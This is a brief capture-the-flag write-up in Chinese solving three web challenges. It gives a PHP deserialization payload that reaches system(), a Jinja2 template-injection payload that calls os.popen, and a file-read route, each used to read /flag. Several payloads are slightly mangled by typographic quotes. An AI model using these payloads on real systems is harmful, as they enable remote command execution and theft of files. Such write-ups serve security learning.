WEB-1

dirsearch直接扫靶机扫出www.zip

看源码

<?php
​
class Flag{
  public $cmd='whoami';
  public function __destruct()
  {
•    system($this->cmd);
  }
}
unserialize($_GET['flag']);
?>

简单的反序列化，直接打

<?php
class Flag{
  public $cmd='whoami';
  public function __destruct()
  {
•    system($this->cmd);
  }
}
unserialize($_GET['flag']);
​
$a=new Flag();
$a->cmd='cat /flag';
$b=serialize($a);
echo $b;
?>

payload：/c2VyaWFsaXpl.php?flag=O:4:”Flag”:1:{s:3:”cmd”;s:9:”cat /flag”;}

WEB-3

检测出花括号SSTI漏洞

搜个payload：{%print ((lipsum)|attr(“globals“)).get(“os”).popen(“cat /flag”).read()%}直接打

WEB-4

一开始不断尝试改后缀上传文件，但怎么都不能绕过白名单，只能传txt文件，发觉白名单限制的太死了，考点应该不是文件上传。dirsearch扫一下，直接扫出一个文件包含的路由

改一下得到payload直接读flag：/solr/admin/file/?file=/flag